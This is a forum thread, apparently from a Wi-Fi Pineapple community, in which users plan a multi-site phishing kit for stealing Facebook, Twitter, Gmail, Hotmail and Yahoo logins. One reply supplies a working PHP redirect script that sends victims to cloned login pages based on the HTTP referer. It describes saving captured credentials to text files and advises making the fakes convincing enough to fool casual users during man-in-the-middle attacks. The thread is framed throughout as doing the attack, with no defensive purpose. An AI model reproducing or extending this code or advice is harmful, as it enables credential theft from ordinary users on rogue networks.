Jump to content

Building A Multi-phishing-package


Mark4FanGer
 Share

Recommended Posts

Hello Forums,

some questions:

i would like to build a package (with scripts and pages) to phish some passwords for facebook, twitter and so on.

doing this for one of the pages wasnt hard (as described here often).

all credentials should be writen to a file (seperated for each page, twitter.txt for twitter, facebook.txt for facebook and so on.)

it should be easy extentable (means easy to add another pages)

its easy to redirect all pages together, but this is not what i want.

so any ideas ?

regards

Link to comment
Share on other sites

I think what I gather from what he said is a SINGLE script which is able to pull off logins and passwords of sites what ever they may be. From what I know thats not possible since each site looks different and as a result has different code. Could you clarify? I too am looking into starting to create my own phishing files... Hoping to get quite proficient to the point it wont take me a matter of minutes to make one from what ever site I pick. =)

Link to comment
Share on other sites

I think he is asking if it would be possible to have multiple landing pages.

Eg: www.gmail.com ----> www.gmail.com/gmailredirect.php

And

www.facebook.com ----> www.facebook.com/facebookredirect.php

And

www.twitter.com ----> www twitter.com/twitterredirect.php

Etc...

All at the same time. (without changing scripts)

Link to comment
Share on other sites

Hello Forums,

some questions:

i would like to build a package (with scripts and pages) to phish some passwords for facebook, twitter and so on.

doing this for one of the pages wasnt hard (as described here often).

all credentials should be writen to a file (seperated for each page, twitter.txt for twitter, facebook.txt for facebook and so on.)

it should be easy extentable (means easy to add another pages)

its easy to redirect all pages together, but this is not what i want.

so any ideas ?

regards

This guide was originally meant for the older models of the pineapple, but the scripts still work:

http://hak5.org/hack/pineapple-phishing

I have my pineapple set up for multiple phishing pages by redirecting to a redirect.php script and then when the user clicks login or submit the form (with another .php script) that collects the info sends that info to a txt file and shows an error page to the user.

redirect.php:

<?php
$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook"))	{ header('Location: facebook.html'); }
if (strpos($ref, "twitter"))	{ header('Location: twitter.html'); }
if (strpos($ref, "hotmail"))	{ header('Location: Hotmail.htm'); }
if (strpos($ref, "live"))	{ header('Location: Hotmail.htm'); }
if (strpos($ref, "gmail"))	{ header('Location: Gmail.htm'); }
if (strpos($ref, "yahoo"))	{ header('Location: Yahoo.htm'); }

require('peets.html');
?>	

Link to comment
Share on other sites

This guide was originally meant for the older models of the pineapple, but the scripts still work:

http://hak5.org/hack/pineapple-phishing

I have my pineapple set up for multiple phishing pages by redirecting to a redirect.php script and then when the user clicks login or submit the form (with another .php script) that collects the info sends that info to a txt file and shows an error page to the user.

Remember, once you start cloning your chosen sites. Input your own code snippets/design your own login area (username & password fields)

You just have to make it look real enough to fool a casual user. One of the points about MITM attacks is that we feel secure and trusting of our ISP, especially when it looks like we are connected to our own network.

So long as the login page is simple and lookslegit to the end user, they will easily enter creds

Just my opinion ! :)

Link to comment
Share on other sites

Hello,

I think he is asking if it would be possible to have multiple landing pages.

Eg: www.gmail.com ----> www.gmail.com/gmailredirect.php

And

www.facebook.com ----> www.facebook.com/facebookredirect.php

And

www.twitter.com ----> www twitter.com/twitterredirect.php

Etc...

All at the same time. (without changing scripts)

this is right :-)

another question: what is inside the file peets.html ?

regards

Link to comment
Share on other sites

sorry just got it:

The fourth line will only be processed if the statements above aren’t found to be true. In our example we’re only looking for facebook but the list could be more extensive. The require function tells php to load up the contents of the file—in our case peets.html. This could be anything from terms of service agreement, an in-flight Internet purchase page or the old index file from our beloved Auto-Rickroll.

Link to comment
Share on other sites

What about local cage proxy to store all of the websites and a custom php script to recall all of them?

500gb usb storage device-->proxy installed on the usb--> pluged in to mk4 ??

or

website-->local proxy-->custom php script to modify login page-->back to user ??

Just thinking out loud.

Edited by catz
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...